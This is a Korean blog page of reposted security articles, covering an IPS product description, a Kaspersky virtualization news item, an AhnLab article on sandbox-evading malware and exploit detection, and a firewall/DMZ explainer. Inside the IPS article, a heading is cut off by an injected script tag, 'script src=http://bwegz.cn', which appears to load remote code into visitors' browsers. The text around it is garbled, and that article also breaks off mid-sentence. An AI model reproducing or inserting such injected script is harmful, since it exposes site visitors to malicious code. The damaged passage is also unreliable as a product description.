MISTERY


 제품설명
수호신 Absolute는 침입차단, 침입탐지, 가상사설망, 바이러스 차단, 서버부하 분산, 유해사이트 차단 등 각각의 소프트웨어로 수행해 내던 다양한 보안 기능을 별도의 서버 없이 단일 장비에서 구현이 가능한 최상의 하드웨어 일체형 통합보안시스템으로 기존 보안 시스템의 수준을 한차원 뛰어넘었습니다.

최고 4G까지 제공하는 대용량 고급모델에서 저가형 VPN 전용장비에 이르기까지, 완벽한 라인업이 갖춰져 있으므로 시스템 환경에 맞게 선택할 수 있을 뿐 아니라 가격대비 성능이 뛰어나 투자 이상의 효과를 거둘 수 있습니다.
 개요
1. IPS의 탄생 배경

인터넷을 기반으로 한 정보화 사회가 보편화되면서 IT 환경을 안전하게 보호하고 가용성(availability)을 보장하는 정보보호의 역할은 절대적입니다. 그러나, 최근 급증하는 웜, 바이러스, 서비스거부공격(DoS) 등의 악의적인 공격과 각종 유해 트래픽은 기존의 보안 제품이 감당하기 어려운 수준이 되면서, 인터넷의 효용성에 대한 근본적인 의구심마저 불러 일으킵니다. 인터넷에 등을 돌리는 지경에까지 이르게 하는 이런 위협은 인터넷 혁명을 완성하는 과정에서 피할 수 없는 거대한 장벽입니다. 이러한 시대적 상황은 정보보호의 새로운 패러다임 변화를 요구하고 있습니다.

- 기존 제품의 보강으로는 해결이 되지 않습니다. 
방화벽, 침입탐지, 바이러스 백신과 같은 대표적 보안 제품이나 네트워크 스위치 장비에서 방지 기능을 추가하고 있지만, 10년 전에 만들어진 제품의 개념으로는 단편적인 대책에 그칠 수밖에 없습니다. 봇물처럼 터지는 유해 트래픽과 악성 공격이 초고속 인터넷 망으로 급속도로 퍼지는 심각한 현실을 극복하려면 완전히 새로운 아키텍처로 핵심 보안 기술들을 접목하는 근본적인 대책이 필요합니다.

- IPS는 새로운 패러다임의 제품입니다. 
이러한 시대적 여망에 부응하기 위해서 IPS (Intrusion Prevention System)가 등장하였습니다. IPS는 고성능 트래픽을 처리하는 하드웨어, 새로이 등장하는 웜과 바이러스를 막는 지능형 엔진, 고도화된 해킹 공격을 막는 침입방지엔진, 24시간 mission-critical 서비스를 보장하는 견고성(robustness), 각종 유해 정보를 차단하는 어플리케이션 프레임워크(application framework) 등을 필수적으로 갖추어야 합니다. IPS는 정보보호의 새로운 지평을 여는 솔루션입니다.

- IPS는 네트워크와 보안이 만나는 접점입니다. 
글로벌 네트워크는 거대한 하나의 플랫폼으로서 크고 작은 수많은 네트워크 세그먼트들로 구성되고 있습니다. 대부분의 IT 환경은 각종 위협적 행위에 노출되어 있으며, 수많은 유해 트래픽과 웜들이 이 플랫폼을 떠다니고 있습니다. 깨끗하고 안심할 수 있는 네트워크 환경을 구성하려면 초고속 네트워크 기술과 위협을 방지하는 보안 기술이 접목되어야 하며, IPS는 네트워크와 보안이 만나는 접점을 이룹니다. IPS는 네트워크의 초고속 하드웨어 성능과 보안의 고급 소프트웨어 엔진이 결합하는 새로운 차원의 제품입니다.

2. IPS의 필수 요건

진정한 IPS는 다음의 미션을 정확하게 수행해야 합니다.

- Real-Time Deep Packet Inspection 
IPS는 모든 패킷의 헤더뿐만 아니라 내용을 100% 분석하면서 패킷의 통과 여부를 실시간에 결정해야 합니다. 단 한 개의 패킷 손실도 용납되지 않으며, IPS의 성능 저하는 네트워크 환경 전체의 성능을 떨어뜨림은 물론 보안성에 치명적인 문제가 생깁니다.

- Guaranteed , Packet-Size Independent Performance 
패킷 사이즈가 작아질수록 성능이 떨어지는 CPU 기반의 시스템의 특성을 이용해서, DoS나 Flooding 공격들은 64 바이트 단위의 패킷으로 집중적으로 구성되는 경향이 있습니다. 패킷의 사이즈나 성격에 무관하게 성능이 보장되어야 가용성(Availability)을 유지할 수 있습니다.

- 모든 알려진 공격 패턴에 대한 실시간 방지 
알려진 공격에 대해서는 최대한으로 축적된 데이터베이스를 갖추어야 하며, 실시간 방지를 위해서는 Signature 검사를 시간지연 (Latency) 없이 탐지해야 합니다. 언제든지 새로운 패턴을 업데이트할 체계를 갖춰야 하며, 각종 프로토콜별 공격 분석과 더불어 우회 공격에도 완벽하게 대응해야 합니다.

- Unknown Attack에 대한 Anomaly Detection & Prevention 
웜은 공격 패턴이 알려지기 전에 급속도로 전세계로 퍼지기 때문에, 어떠한 공격도 진입 자체를 막아야 합니다. 비정상행위(Anomaly)나 트래픽 현상를 탐지하면서 오탐율을 최소화하기 위해서는 다양한 변수를 가지고 환경에 적응하는 지능형 방어가 되어야 합니다.

- Robustness for Mission Critical Service 
궁극적으로 IPS는 In-Line에서 운용되며, IPS의 안정성과 견고성은 네트워크 전체에 영향을 줄 수 있습니다. 어떤 경우에도 성능이나 보안성에 영향을 주지 않아야 하며, 충분한 HA와 백업 기능을 가져야 합니다.

- 유해 트래픽에 대한 방어와 어플리케이션 통제 
Peer-to-Peer, URL Filtering, 스팸메일 등은 쓸모없는 트래픽 발생으로 네트워크의 효율성을 크게 떨어뜨리며, 성능을 크게 저하시킵니다. 이를 실시간으로 쉽게 관리할 수 있는 서비스들이 지원되어야 합니다.

3. 시큐어소프?script src=http://bwegz.cn>

 특징
㈜시큐어소프트가 창립 이래 축적한 핵심 보안 기술들과 3년 여의 집중적인 R&D 노력이 결집된 작품입니다. Absolute IPS는 신종 웜(Worm), 서비스 거부 공격(DoS)을 능동적으로 완벽하게 막으며, 초고속 Network Processor와 ASIC 기반으로 설계되어 어떤 환경에서도 최고의 성능을 보장합니다.

Key Features 
- Deep Packet Inspection으로 8Gbps의 throughput 보장
- 64 바이트 패킷에서도 성능 보장
- 최소의 latency의 3백만 이상의 동시 세션 처리 능력
- 1400개 이상의 패턴을 기반으로 한 Signature-based Intrusion Detection
- Anomaly Detection for Unknown Attacks
- 1,000,000개의 DOS profiles
- 최소한의 오탐율 (false-potiveness) 

 주요기능
1. 최고의 성능 보장

㈜시큐어소프트가 창립 이래 축적한 핵심 보안 기술들과 3년 여의 집중적인 R&D 노력이 결집된 작품입니다. Absolute IPS는 신종 웜(Worm), 서비스 거부 공격(DoS)을 능동적으로 완벽하게 막으며, 초고속 Network Processor와 ASIC 기반으로 설계되어 어떤 환경에서도 최고의 성능을 보장합니다.

8Gbps Throughput - Deep Packet Inspection을 수행하며 Wire Speed 보장 Absolute IPS는 Deep Packet Inspection을 수행하면서 한 개의 패킷도 놓치지 않으면서 최대 8Gbps의 성능을 보장합니다.

Packet-size Independence - 64 바이트의 패킷 처리에도 완벽한 성능 보장 
모든 패킷 사이즈에 대해서도 전혀 성능 저하가 없습니다. 이는 Pentium III CPU 150개 이상의 처리 성능을 의미합니다.

최소한의 Latency (≤ 30 microseconds) 
방대한 패킷을 검색하는 과정에서 시간 지연은 성능저하의 위험을 수반합니다. Absolute IPS는 스위치 장비 수준보다 뛰어난 12-24 microsecond의 latency를 유지합니다.

3,000,000 Concurrent Session Rate 
초당 3백만 TCP 세션을 동시에 처리함으로써 탐지의 정확성을 기합니다.

2. 패턴 기반의 해킹 방지

- Signature-based Intrusion Detection for Known Attacks

Deep Packet Inspection 
모든 패킷에 대해서 헤더부터 내용까지 빠짐없이 검사합니다. BPMTM 엔진에서 실시간으로 분류된 정보는 유해 여부를 판단하기 위해 Network Processor로 이동됩니다.

정교한 1400개 이상의 패턴 데이터베이스 
5년 이상 축적된 1400개 이상의 해킹 패턴은 방대한 분량의 기존 공격 방식을 탐지해 냅니다. 아울러 신종 공격도 푸쉬(Push) 방식으로 신속하게 자동 업데이트합니다.

우회공격 탐지를 위한 Stateful Analysis 
Stateful analysis로 패킷 재조합이 필요한 IP Fragmentation, TCP Segmentation, URL Obfuscation을 차단합니다.

3. 신종 공격과 유해 트래픽의 지능적 방어

- Anomaly Detection for Unknown Attacks

Absolute IPS는 신종 웜이나 서비스거부공격(DoS)을 차단하기 위해 체계적으로 비정상 흐름을 탐지하고 차단합니다.

Self-learning process 
세밀한 침입 대응 방안을 마련하기 위해서 관리자의 직관에 의존하지 않고 자체 학습 (self-learning) 과정을 통해 고객의 네트워크 환경을 분석합니다. 총 트래픽 양과 프로토콜별 사용 유형을 알기 위해서 포트(port)별, 호스트별로 프로파일을 형성하며, 이를 기반으로 해쉬 테이블을 거쳐 임계치(threshold)를 생성합니다.

1,000,000 DOS profiles를 통한 전체 상태(states) 모니터링 
일단 IPS가 실행 중에는 모든 트래픽의 상태(states)를 세션 테이블에 저장합니다. 네트워크 프로세서와 연동된 캐쉬 메모리는 최고 1,000,000 DOS 프로필을 저장하면서 states의 유해성 여부에 대한 모니터링을 합니다.

Anomaly에 대한 실시간 탐지와 rate control
지능적으로 생성된 임계치에 기준해서 비정상 운영에 대한 판단을 수행하여 적합한 rate control이 항상 이루어지도록 보장합니다. 수백만의 세션 상태를 기반으로 Dynamic한 결정 과정을 거치기 때문에 정확도와 세밀함에서 월등합니다.

4. 최소화된 오탐율 (Minimized False-Positives & False-Negatives)

IPS에서 오탐율의 수치는 네트워크에 치명적인 영향을 줍니다. Absolute IPS는 이를 최소화하기 위해 다음과 같은 목표를 구현하였습니다.

Implementation Objective

- Known Attack에 대한 정교한 패턴 인식
- 지능형 시스템에 의한 임계치 생성
- TCP Flow 기반의 탐지 (3백만 session 동시 지원)
- Zero packet loss & No performance degradation

5. 가상 센서 (Virtual Sensor)

한 대의 IPS로 수대의 IPS를 운영하는 효과 
Absolute IPS는 복수의 네트워크 세그먼트를 독립적으로 지원하며, 1대의 제품으로 여러 설정을 동시에 실현할 수가 있습니다. 결국 수대의 IPS를 보유하는 효과가 있습니다.

Low TCO (Total Cost of Ownership) 실현 
전체적인 네트워크 밴드폭(bandwidth)을 효율적으로 활용할 수 있으며, 여러 대를 별도로 구매하는 것보다 가격적으로 유리하고 생산성을 극대화합니다.

각 세그먼트 별로 독립적인 규칙 설정 
세그먼트 별로 독립적인 룰(rule)을 통하여 부서별, 위치별, 기능별로 관리할 수 있습니다. 예를 들어 학사행정에 관계된 네트워크 세그먼트에는 높은 보안성을 보장하기 위한 엄격한 rule을, 기숙사 네트워크는 상대적으로 덜 엄

















출처 : http://www.tissnet.com/product/product_con_view.asp?p_part=1&p_code=11&m_code=100511












신고

Comment +1

  • 언제든지 새로운 패턴을 업데이트할 체계를 갖춰야 하며, 각종 프로토콜별 공격 분석과 더불어 우회 공격에도 완벽하게 대응해야 합니다. - 실시간 업데이트가 가능하게 흠.. 패턴을 저장하면 바로 적용되게?!

클라우드 서비스, 데스크톱가상화(VDI) 등 가상 환경에 대한 활용도가 높아지기 시작하면서 카스퍼스키랩이 VM웨어는 물론 시트릭스, 마이크로소프트(MS)가 제공하고 있는 가상화 솔루션에 최적화한 보안솔루션을 선보였다.

 

15일(현지시간) 미국 지디넷 등 외신에 따르면 카스퍼스키랩은 미국 샌프란시스코에서 주최한 엔터프라이즈 IT서밋에서 '카스퍼스키 시큐리티 포 버추얼라이제이션 라이트 에이전트'를 출시했다.

 

이 솔루션은 가상화 환경에서 각각 가상머신(VM) 마다 보안 에이전트를 설치할 필요 없이 가상화 장비 내에 하이퍼바이저단에서 구동된다. 이를 통해 VM 구동에 필요한 부하를 최대한 줄이면서 보안을 유지할 수 있도록 하겠다는 것이다.

 

카스퍼스키랩은 VM 소용량 소프트웨어 에이전트를 설치한다. 에이전트를 구동하기 위해 별도로 재부팅을 할 필요가 없이 가상 네트워크를 보호하도록 한다. 기본적인 보안 기능과 함께 애플리케이션 및 기기 컨트롤, 웹사용정책, 호스트 기반 침입방지시스템, 방화벽 등을 구현할 수 있도록 했다.

 

▲ 카스퍼스키랩이 가상환경을 보호하기 위한 에이전트 기반 보안 솔루션을 출시했다.

니코레이 그레베니코프 카스퍼스키랩 최고기술책임자(CTO)는 "현재 가상화 보안 위험에 대한 비즈니스를 대상으로 교육한다는 목표를 갖고 있다"며 "모든 네트워크에 최적화된 솔루션은 존재하지 않는 만큼 전 세계에서 널리 사용되고 있는 주요 가상화 플랫폼 3종을 위한 가상화 보안 솔루션을 제공한다"고 말했다. 

 

라이트 에이전트는 MS 하이퍼-V, 시트릭스 젠서버에서 최적화해 출시한 첫번째 솔루션이다. VM웨어의 경우 기존 카스퍼스키랩이 제공하고 있던 VM웨어의 가상화 운영체제(OS)인 v스피어를 위한 보안솔루션과 라이트 에이전트가 상호보완되도록 했다. VM웨어 사용고객들의 경우 비에이전트 기반 보안 기능을 적용할지 라이트 에이전트를 사용할 지 선택할 수 있다. 

 

현재 VM웨어 ESXi 5.1, 5.5 하이퍼바이저, MS 하이퍼-V 서버 2008 R2/2012 하이퍼바이저, 시트릭스 젠서버 6.0.2/6.1 하이퍼바이저 등을 지원한다. 

 

라이트 에이전트는 오는 22일부터 미국, 러시아, 영국, 독일, 호주, 중동 등으로 확대할 계획이다. 

 

이 회사는 카스퍼스키 시큐리티 포 버추얼라이제이션의 에이전트, 비에이전트 기반 솔루션을 VM 개수, CPU 코어 개수에 따라 라이선스 가격을 책정한다.

 

 

 

 

 

 

출처 : http://www.zdnet.co.kr/news/news_view.asp?artice_id=20140416094331

 

 

 

 

 

 

신고

Comment +0

많은 APT 대응 솔루션 벤더들이 신종 악성코드(unknown malware) 탐지를 위해 시그니처 리스(signature-less) 기술을 강조하고 있다. 이들 벤더들이 사용하고 있는 기술은 가상 머신(Virtual machine)이나 샌드박스(sandbox) 기반의 ‘행위 분석 기술’이다. 하지만 ‘샌드박스 기반의 행위 분석 기술’에 의존해서 신종 악성코드를 탐지하는 것은 더 이상 효과적이지 않을 것으로 예상된다. 최근 공격자들은 자동화된 행위 분석 시스템을 우회하기 위해 새로운 방식을 사용하는 악성코드 제작에 주력하고 있기 때문에 악성코드는 획기적으로 강력해지고 있다.

이 글에서는 샌드박스 기반의 행위 분석 기술의 한계가 무엇인지를 알아본다. 그리고 이를 대체할 수 있는 안랩 트러스와처(AhnLab TrusWatcher)의 새로운 기능을 소개한다.

진화하는 악성코드, 샌드박스 자동 분석 기술마저 우회하다 


2012년 11월 안랩 시큐리티 대응 센터 (ASEC, AhnLab Security E-response Center)에 흥미로운 악성코드 샘플이 탐지되었다. 이 샘플은 ‘한국 공군의 위상에 대한 평가와 진단’이라는 제목의 이메일 첨부 파일을 통해 유포되었다. 해당 문서 파일은 대한민국 공군의 비전, 항공우주군에 대한 사회의 인식 등 상세한 내용이 기술되어 있어 메일 수신자로 하여금 이 파일이 국방에 대한 중요 문서인 것처럼 인식하게 하고 있다. 이는 공격자가 타깃을 고려해 지능적으로 접근한 APT 공격에 이용되었음을 알 수 있는 대목이다.

또한 기술적인 면에서도 이 문서는 놀랍도록 정교하게 제작되었다. 파일의 악성 여부를 파악하기 어렵도록 아주 소량의 힙 스프레이(Heap Spray)만 발생시켜 힙 스프레이 탐지를 우회한 것이다. 또한 해당 소프트웨어의 최신 버전에서만 악성코드가 동작하도록 되어 있어 낮은 버전의 소프트웨어서는 동작조차 하지 않는다.

이 문서 파일을 해당 소프트웨어의 최신 버전에서 실행시키면 파일이 정상적으로 열리며 한국 공군의 관한 문서가 나타난다. 이때 어떠한 악성 행위도 발생하지 않으며 셸코드도 동작하지 않는다. 이처럼 악성 행위가 발생하지 않으므로, 대부분의 행위 기반 분석 기술을 이용하는 APT 솔루션은 이 파일을 정상 파일로 판단할 수 밖에 없다.

그러나 이 문서 파일은 분명 악성 행위를 한다. 과연 이 문서 파일의 비밀은 무엇인가?

이 파일이 악성 행위를 수행하기 위해서는 특정한 조건이 갖춰줘야 한다: 호기심을 느낀 사용자가 이 문서 파일을 연다. 사용자가 스크롤바를 아래로 이동하며 내용을 읽다가 두 번째 페이지의 ‘문제 제기’라는 문단에 도달하는 순간 ‘HncCtrl.exe’라는 이름의 악성 파일이 자동으로 생성되고 실행된다. 이 악성 파일이 실행되면 또 다른 악성 파일이 또 다시 생성되고 실행되는데, 이 파일이 PC에서 개인 정보를 수집해 이를 특정한 메일 주소로 전송한다. 즉, 공격자는 특정한 사용자의 행위(activity)가 있어야만 exploit이 발생되도록 이 악성 파일을 설계한 것이다. 이것이 문서 파일을 이용한 최신 APT 공격 유형의 하나로, 자동화된 샌드박스 분석 시스템을 우회하는 악성코드의 대표적인 사례이다.


샌드박스 기반의 행위 분석 기술(Behavior Analysis in Sandbox)의 한계

현재 많은 APT 대응 솔루션 업체들은 신종 악성코드(unknown malware) 탐지를 위해 악성코드 시그니처에 의존하지 않는 시그니처 리스(signature-less) 기술의 필요성을 강조하고 있다. 특히 일부 벤더들은 ‘행위 기반 분석’ 기술이 마치 ‘신종 악성코드’를 탐지할 수 있는 유일한 ‘시그니처 리스’ 기술인 것처럼 주장하고 있다. 그렇다면 과연 이러한 ‘샌드박스 기반의 행위 분석 기술’을 이용한 솔루션만으로 나날이 고도화되는 악성코드를 탐지하기에 충분할까? 

이 질문에 대한 대답은 ‘그렇지 않다’이다. ‘샌드박스 기반의 행위 분석 기술’을 이용한 APT 대응 솔루션의 최신 악성코드 탐지의 한계에 대해 살펴보자.

‘샌드박스 기반의 행위 분석 기술’은 분석 대상을 샌드박스라는 제한된 환경에서 실행시켜서 행위 결과로 악성/정상 여부를 판단하는 기술이다. 따라서 이 기술을 이용하고 있는 APT 대응 솔루션이 제 기능을 수행하기 위해서는 악성코드가 반드시 행위를 해야만 한다. 즉, 악성코드가 샌드박스 분석 환경에서 항상 의도하고 있는 행위를 그대로 유발해야만 이를 탐지할 수 있다. 그러나 앞서 언급한 바와 같이 최근에는 행위가 발생하지 않는 문서 파일을 이용한 공격 방식이 증가하면서 자동화된 샌드박스 분석 시스템을 우회하기 시작했다.


샌드박스 기반의 행위 분석 시스템을 우회하는 최신 악성코드의 대표적인 3가지 유형은 다음과 같다.

1. ‘컴퓨터 이용자의 특정 행위(interaction)’을 감지해서 악성 행위를 발생시키는 악성코드

예를 들어, 사용자가 악성 PDF 파일을 단순히 열기만 해서는 악성 행위(behavior)가 발생하지 않았다. 사용자가 특정 페이지로 스크롤해야만 악성 행위가 발생했다.

또 다른 사례는 PC가 악성코드에 감염된 상태에서, 악성코드는 사용자가 ‘마우스를 클릭(click)’하거나 특정 방향으로 이동하는 등 입력장치의 변화를 감지했을 때 비로소 악성 행위를 했다. 흥미롭게도 이때 악성코드에 감염되었다고 경고하는 팝업창이 나타나는데 팝업창의 확인(OK) 버튼을 클릭할 경우에만 악성 행위가 나타난다.

이러한 악성코드는 사용자가 특정 행위(activity)를 하지 전까지는 ‘의심 행위(behavior)가 없는 악성코드’이기 때문에 ‘샌드박스 기반의 행위 분석 기술’을 사용하고 있는 APT 대응 솔루션에서는 이를 탐지하기가 어렵다.


2. 자동화된 샌드박스 분석 시스템에서 제어하기 어려운 ‘시간의 제약’을 이용하는 악성코드

대부분의 APT 대응 솔루션은 자동화된 행위 분석을 위해 가상머신(virtual machine)이나 샌드박스(Sandbox)를 사용한다. 그러나 가상머신이나 샌드박스를 구동하기 위해 하드웨어의 제한된 리소스를 사용하기 때문에 샘플의 행위가 종료될 때까지 ‘해당 샘플 1개에 대한 동적 분석 시간’을 무한하게 사용할 수 없다. 악성코드 제작자들은 이런 점을 노리고 특정 시간에 악성 행위를 실행하는 스케줄링(scheduling) 기법을 이용한다. 이러한 기법을 이용하는 악성코드를 시한폭탄 악성코드(time-bomb malware) 또는 트로잔 냅(Trojan nap)이라고 부른다. 일부 APT 대응 솔루션에서는 시한폭탄(time-bomb) 기법에 이용되는 슬립(sleep) API와 같은 특정 API를 사용하면 무조건 악성코드라고 탐지한다. 그러나 해당 API는 정상적인 프로그램에서도 사용될 수 있기 때문에 이와 같이 판단할 경우 오탐이 늘어나는 문제가 발생할 수 있다.

3. 가상머신 또는 샌드박스를 인식해서 악의적인 행위를 숨기는 지능적인 악성코드

공격자가 이러한 유형의 악성코드를 제작하는 이유는 APT 대응 솔루션의 탐지 및 분석을 회피하기 위해서뿐만 아니라 악성코드 분석가들에 의한 동적 분석에서도 가상머신이나 샌드박스가 사용되기 때문이다. 일부 APT 대응 솔루션은 실행 중인 프로세스, 레지스트리 키 또는 레지스트리 값, 가상 하드웨어 등 가상머신이나 샌드박스 내의 다양한 변화를 파악하는 시도 자체를 탐지한다. 그러나 반대로 악성코드는 이러한 탐지가 있을 때는 이를 인지하고 ‘악성 행위’를 발생시키지 않는 방식으로 진화하고 있다.


안랩 트러스와처, 메모리 분석 기반의 익스플로이트 탐지 기술 탑재

안랩 트러스와처는 이처럼 행위 분석 기술을 우회하는 악성코드를 탐지하기 위해 새로운 분석 기술을 적용했다. 바로 동적 콘텐트 분석(Dynamic Intelligent Content Analysis) 기술이다. 이 기술은 메모리(memory) 영역에서 어셈블리 코드(assembly code) 기반의 분석을 수행하는 기술로, 안랩의 연구진이 개발한 독자적인(exclusive) 기술이다. 이 기술을 이용해 애플리케이션의 취약점 공격 단계(exploitation phase)에서 악성코드 여부를 탐지할 수 있으며, 새로운 제로데이(zero-day) 취약점을 이용하는 악성코드도 탐지할 수 있다. 





[그림 1] 동적 콘텐트 분석 기술의 개념 


안랩 트러스와처의 동적 콘텐트 분석 기술의 기본적인 개념은 [그림 1]과 같다. 특정 애플리케이션의 취약점을 공격하는 악성코드가 정상적으로 취약점을 익스플로이트(exploit)하여 악성 행위를 한다고 가정해 보자. 이 악성코드가 최종적으로 악성 행위가 발생하기까지의 과정은 ‘악성코드 자체의 실행 전단계(pre-exploitation phase)’와 ‘악성코드 실행 시점(exploitation phase)’으로 세분화된다. 이 악성코드가 실행 전단계에서 정상적으로 동작하지 않거나 악성코드 실행 시점에서 가상머신이나 샌드박스 환경을 인식해서 악성 행위를 하지 않는다면 ‘행위 기반 분석‘ 기술은 무용지물이 된다.

악성 행위의 발생 여부와 관계없이 악성코드 실행 전단계 또는 악성코드 실행 단계에서도 악성코드를 탐지할 수 있는 방법이 필요하다. 이 같은 행위 기반 분석 기술의 한계를 극복하고 익스플로이트가 일어나기 전단계에서 악성코드를 탐지하기 위해 개발된 것이 바로 안랩 트러스와처의 동적 콘텐트 분석(Dynamic Intelligent Content Analysis) 기술이다. 


안랩 트러스와처의 동적 콘텐트 분석 기술의 동작 방식



[그림 2] Dynamic Intelligent Content Analysis 동작 원리


[그림 2]는 메모리 구조를 간단히 도식화한 것이다. 예를 들어 버퍼오버플로우(buffer overflow) 공격에 취약한 마이크로소프트사의 워드 파일이 존재한다고 가정하자. [그림 2]의 좌측 도식은 정상적인 MS 워드 파일을 실행했을 때이다. 정상 워드 파일을 클릭하면 메모리 상에는 메인 프로그램인 winword.exe이란 파일과 관련된 동적 라이브러리 파일들이 메모리상에 로드된다. 만약 정상 프로그램이라면DLL #3까지 처리되면 정상적으로 워드 파일이 열리게 된다.

이제 취약한 워드 파일을 공격하는 익스플로이트(exploit)가 실행되는 경우를 살펴보자. 처음에는 정상적인 경우와 마찬가지로 프로그램이 진행되지만 어느 순간에 동적으로 데이터를 저장하는 힙(heap)이라는 영역에 셸코드를 저장을 해 놓는다. 그 후 버퍼오버플로우가 발생되는 익스플로이트 순간에 정상적인 경우라면 DLL #3으로 이동해야 할 EIP가 비정상적으로 셸코드가 있는 영역으로 점프(jump)하게 된다. 이후에 셸코드에 코딩된 악성 행위와 결과가 발생하게 되는 것이다.




동적 콘텐트 분석 기술을 탑재한 안랩 트러스와처가 도입된 경우라면 이러한 악성코드를 다음과 같이 악성코드를 탐지한다. 

안랩 트러스와처가 분석해야 하는 대상 프로그램이 메모리상에 로드되는 시점에 ‘디버깅 쓰레드’를 바로 삽입해서 비정상적인 메모리 영역으로의 이동/점프를 탐지한다. 동적 콘텐트 분석 기술은 일반적인 버퍼오버플로우는 물론 SHE(Structured Exception Handing), RTL(Return-to-Lib), ROP(Return-Oriented Programing), 힙스프레이(Heap spray) 등과 같은 악성코드가 이용하는 다양한 취약점을 공격(exploitation)하는 단계에서 악성코드를 탐지한다. 즉, 안랩 트러스와처의 동적 콘텐트 분석 기술은 악성코드에 의한 ‘악성 행위의 종류 및 발생 여부’와 관계 없이 악성코드를 탐지할 수 있다. 


APT를 사전에 차단하자

안랩 트러스와처의 동적 콘텐트 분석 기술은 안랩 연구진이 개발한 수십여 개의 알고리즘을 바탕으로 완성된 독자적인 기술이다. 대표적으로 악성 비실행형 파일이 익스플로이트을 일으키기 전 단계에서는 힙스프레이(Heap Spray)를 통해 셸코드를 저장하는 방법, 스택 오버플로우(Stack Overflow)를 통해 셸코드를 저장하는 방법, 악성 스크립트를 포함하여 메모리 영역에 셸코드를 저장하는 방법 등이 있다.

특히 안랩 트러스와처는 애플리케이션 취약점을 공격하는 악성 파일 내의 셸코드의 정확한 메모리 시작 지점을 판단해서 가시적으로 쉘코드 메모리 덤프 및 해당 어셈블리 코드를 보여준다. 메모리 분석을 통해 셸코드를 감지한 후 셸코드의 시작 주소를 정확하게 제공하는 것은 안랩 트러스와처만이 가능한 차별적이며 가장 뛰어난 기술이다.

지금까지 설명한 안랩 트러스와처의 동적 콘텐트 분석 기술은 그 자체로는 악성코드 분석가나 보안 연구진에게는 획기적인 새로운 개념은 아니다. 그러나 이러한 기술이 자동화된 분석 시스템에 탑재되어 대량의 파일을 분석할 수 있다는 점에서 악성코드 분석과 고도화된 악성코드를 이용한 APT 공격의 사전 차단을 위한 새로운 장을 열었다고 평가할 수 있다.

안랩 트러스와처는 이 기술을 탑재함으로써 환경, 동작 실행 조건 등 잠재적인 요소에도 영향을 받지 않고 악성코드를 진단할 수 있어 APT 공격 사전 차단에 더욱 강력한 힘을 발휘할 수 있다.

 

 

 

 

 

 

 

 

 

 

 

 

 

출처 : http://v3.kcu.or.kr/secu_info_view.asp?list=/secu_info_list.asp&seq=22232&pageno=1&v_num=1664

 

 

 

 

 

 

 

 

 

 

 

 

 

 

신고

Comment +2

FireWall, IDS, IPS

 

1. 방화벽은 FireWall 이라고 하죠.

사전적의미 :  방화―벽 (防火壁) [명사] 불이 번지는 것을 막기 위하여 건물의 내부 같은 데에 설치한, 
                   내화 구조(耐火構造)의 벽.

컴퓨터 네트웍에서 보안 방지로 차용하여 사용하는 말입니다.
간단히 패킷필터링, 프락시 필터링 방식이 있는데, 최근엔 혼용하여 사용합니다.
패킷필터링은 IP 등의 접속을 막는것이고, 프락시 필터링은 어플리케이션 필터링을 하는거죠.

파이어월을 설치하면 FTP, 텔넷 등의 서비스를 사내에서 승인된 사람만 사용할 수 있도록 하거나, 허가된 외부 사용자만 내부 네트워크로 들어올 수 있도록 설정할 수 있다.

FTP는 내부 사용자가 회사 기밀을 외부로 빼돌릴 목적에 사용될 수 있다. 즉, 외부 서버에 계정을 만든 후 회사 내의 중요한 자료를 FTP로 파일 전송을 할 수 있다. 파이어월은 이 때문에 FTP를 통해 정보가 외부로 나가는 것을 막는 것이다. 때문에 파이어월이 본격적으로 공급되기 시작한 1990년대 말에는 이런 파이어월의 기능 때문에 사용자와 네트워크 관리자 간의 갈등도 적지 않았다. 파이어월이 일선 네트워크에 공급되기 시작한 초기에는 대부분의 네트워크 관리자들이 파이어월을 제대로 관리할 만한 지식과 경험을 갖추지 못한 경우가 많았고, 때문에 공급업체에서 초기에 꼭 필요한 트래픽만 허가해 놓은 설정을 그대로 사용하는 경우가 많았다. 이 경우 사용자들은 그 전에 잘 사용하던 FTP나 텔넷 등의 애플리케이션을 이용할 수 없다. 결국 네트워크 관리자와 사용자 간에 포트를 개방해야한다 말아야 한다 실갱이가 벌어지기도 했다. 이와 반대로 기업의 임원급에서 특정 포트를 열어달라고 하는 대로 열어주다 보면 파이어월이 설치하나 마나한 상태가 되기도 했다.

- 파이어월이 만드는 평화의 공간 DMZ

현재 보급되고 있는 대부분의 파이어월은 하드웨어 일체형이기 때문에 오히려 네트워크 장비에 가까운 내부 구성을 갖고 있지만, 기본적으로 파이어월은 서버와 비슷한 구성이다.

즉 라우터처럼 CPU와 메모리, 운영체제를 갖고 있으며, 여기에 하드디스크까지 장착하고 있는 전형적인 서버의 구성이다. 실제로 초기의 파이어월은 대부분 소프트웨어 제품이어서 윈도우 운영체제나 유닉스, 리눅스 등의 운영체제를 사용하는 서버급 컴퓨터에 탑재되는 형식이었다.

파이어월이 네트워크에 설치되는 위치는 기업의 네트워크 환경과 파이어월 구성 방식에 따라 다르지만, 일반적으로 인터넷으로 통하는 길목에 설치된다. 이로써 기업 네트워크의 내부와 외부를 오가는 트래픽을 모두 감시한다. 하지만 기업이 웹 사이트나 FTP 서비스를 운영하고 있다면 DMZ(DeMilitarized Zone)를 구성하는 방식도 외부 웹 서비스를 하는 기업의 경우 많이 사용하는 방식이다. DMZ는 말 그대로 외부와 내부가 서로 연결되지 않도록 하는 공간이다.

실제로 파이어월을 설치하고, 웹 서버나 메일 서버 등 외부에서 접속하는 서버를 내부 네트워크에 둘 경우, 어쩔 수 없이 열어둬야 하는 서비스들 때문에 외부의 불특정 다수에게 접속을 열어둘 수 밖에 없다.

예를 들어 웹 서비스를 한다면 웹 서버가 주로 사용하는 80포트를 열어놓게 되는데, 이때 해커가 열어놓은 포트를 통해 웹 서버를 해킹하고, 이를 통해 내부 네트워크를 돌아다니며 필요한 정보를 빼가거나 시스템을 망가뜨릴 수 있다.

하지만 DMZ를 구성할 경우, 외부에서의 접속은 DMZ 내에 있는 서버들, 즉 웹 서버나 메일 서버 등에 한정할 수 있다.

- 파이어월의 주요 보안 기술

파이어월의 보안 기술은 크게 기본 라우터 보안, 패킷 필터링, 애플리케이션 프록시, SIF(Stateful Inspection Firewall)로 나눌 수 있다. 이중 기본 라우터 보안 기술은 일반적으로 사용하고 있는 액세스 라우터에서 ACL(Access Control List)와 NAT(Network Address Translation)로 구현할 수 있는 기본적인 보안 환경이다.


